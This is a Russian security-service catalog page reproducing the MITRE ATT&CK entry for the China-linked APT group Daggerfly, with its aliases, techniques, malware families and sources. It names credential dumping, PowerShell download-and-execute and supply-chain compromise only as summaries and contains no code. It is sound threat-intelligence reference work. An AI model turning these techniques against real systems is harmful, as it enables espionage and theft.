Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Преступная группа Daggerfly
CVE уязвимости
БДУ ФСТЭК уязвимости
НКЦКИ уязвимости
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
Риски
Каталоги
MITRE ATT&CK
Преступная группа
Daggerfly
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.(Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2023)(Citation: Symantec Daggerfly 2024)(Citation: ESET EvasivePanda 2024)
ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Created: 25 Jul 2024
Last Modified: 31 Oct 2024

Associated Group Descriptions
Name Description
Evasive Panda (Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2024)
BRONZE HIGHLAND (Citation: Symantec Daggerfly 2023)(Citation: ESET EvasivePanda 2024)

Techniques Used
Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Daggerfly uses HTTP for command and control communication.(Citation: ESET EvasivePanda 2024)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.(Citation: Symantec Daggerfly 2023)
Enterprise T1584 .004 Compromise Infrastructure: Server

Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.(Citation: ESET EvasivePanda 2024)
Enterprise T1136 .001 Create Account: Local Account

Daggerfly created a local account on victim machines to maintain access.(Citation: Symantec Daggerfly 2023)
Enterprise T1587 .002 Develop Capabilities: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.(Citation: ESET EvasivePanda 2024)
Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.(Citation: Symantec Daggerfly 2023) Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.(Citation: ESET EvasivePanda 2024)
Enterprise T1036 .003 Masquerading: Rename System Utilities

Daggerfly used a renamed version of rundll32.exe, such as "dbengin.exe" located in the `ProgramData\Microsoft\PlayReady` directory, to proxy malicious DLL execution.(Citation: Symantec Daggerfly 2023)
Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.(Citation: Symantec Daggerfly 2023)
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.(Citation: ESET EvasivePanda 2024)
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.(Citation: ESET EvasivePanda 2024)
Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.(Citation: ESET EvasivePanda 2023)(Citation: ESET EvasivePanda 2024)
Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.(Citation: Symantec Daggerfly 2023)
Enterprise T1204 .001 User Execution: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.(Citation: ESET EvasivePanda 2024)

Software
ID Name References Techniques
S1147 Nightdoor (Citation: ESET EvasivePanda 2024) (Citation: Symantec Daggerfly 2024) Web Service, Process Discovery, Scheduled Task, Windows Command Shell, Hijack Execution Flow, System Checks, System Time Discovery, System Network Configuration Discovery, File Deletion, System Owner/User Discovery, System Information Discovery, Deobfuscate/Decode Files or Information, Application Layer Protocol
S0190 BITSAdmin (Citation: Microsoft BITSAdmin) (Citation: Symantec Daggerfly 2023) Lateral Tool Transfer, Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, BITS Jobs
S0013 PlugX (Citation: CIRCL PlugX March 2013) (Citation: Dell TG-3390) (Citation: DestroyRAT) (Citation: FireEye Clandestine Fox Part 2) (Citation: Kaba) (Citation: Korplug) (Citation: Lastline PlugX Analysis) (Citation: New DragonOK) (Citation: Novetta-Axiom) (Citation: Sogu) (Citation: Symantec Daggerfly 2023) (Citation: Thoper) (Citation: TVT) Modify Registry, File and Directory Discovery, Masquerade Task or Service, Hidden Files and Directories, Multiband Communication, Non-Application Layer Protocol, Keylogging, Dead Drop Resolver, DLL Side-Loading, Process Discovery, Query Registry, DLL Search Order Hijacking, Network Share Discovery, MSBuild, Web Protocols, Windows Service, Windows Command Shell, Ingress Tool Transfer, System Checks, System Network Connections Discovery, Match Legitimate Name or Location, Registry Run Keys / Startup Folder, Custom Command and Control Protocol, DNS, Screen Capture, Commonly Used Port, Symmetric Cryptography, Deobfuscate/Decode Files or Information, Native API, Obfuscated Files or Information
S1146 MgBot (Citation: ESET EvasivePanda 2023) (Citation: Symantec Daggerfly 2024) (Citation: Szappanos MgBot 2014) Keylogging, System Owner/User Discovery, Domain Account, OS Credential Dumping, Credentials from Password Stores, Local Account, Data from Information Repositories, Credentials from Web Browsers, Data from Local System, Data from Removable Media, Domain Trust Discovery, Clipboard Data, Steal Web Session Cookie, Remote System Discovery, Process Discovery, Network Service Discovery, Audio Capture
S1016 MacMa (Citation: DazzleSpy) (Citation: ESET DazzleSpy Jan 2022) (Citation: Objective-See MacMa Nov 2021) (Citation: OSX.CDDS) (Citation: Symantec Daggerfly 2024) System Owner/User Discovery, System Information Discovery, Non-Application Layer Protocol, Code Signing, Screen Capture, System Network Configuration Discovery, Local Data Staging, Launch Agent, Data from Local System, Clear Linux or Mac System Logs, Remote Services, Native API, Audio Capture, Keychain, Exfiltration Over C2 Channel, Process Discovery, Timestomp, Non-Standard Port, Deobfuscate/Decode Files or Information, Keylogging, Unix Shell, Gatekeeper Bypass, Ingress Tool Transfer, Encrypted Channel, File and Directory Discovery, File Deletion
S0075 Reg (Citation: Microsoft Reg) (Citation: Symantec Daggerfly 2023) (Citation: Windows Commands JPCERT) Credentials in Registry, Query Registry, Modify Registry

References

  1. Threat Hunter Team. (2023, April 20). Daggerfly: APT Actor Targets Telecoms Company in Africa. Retrieved July 25, 2024.
  2. Ahn Ho, Facundo Muñoz, & Marc-Etienne M.Léveillé. (2024, March 7). Evasive Panda leverages Monlam Festival to target Tibetans. Retrieved July 25, 2024.
  3. Facundo Muñoz. (2023, April 26). Evasive Panda APT group delivers malware via updates for popular Chinese software. Retrieved July 25, 2024.
  4. Threat Hunter Team. (2024, July 23). Daggerfly: Espionage Group Makes Major Update to Toolset. Retrieved July 25, 2024.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.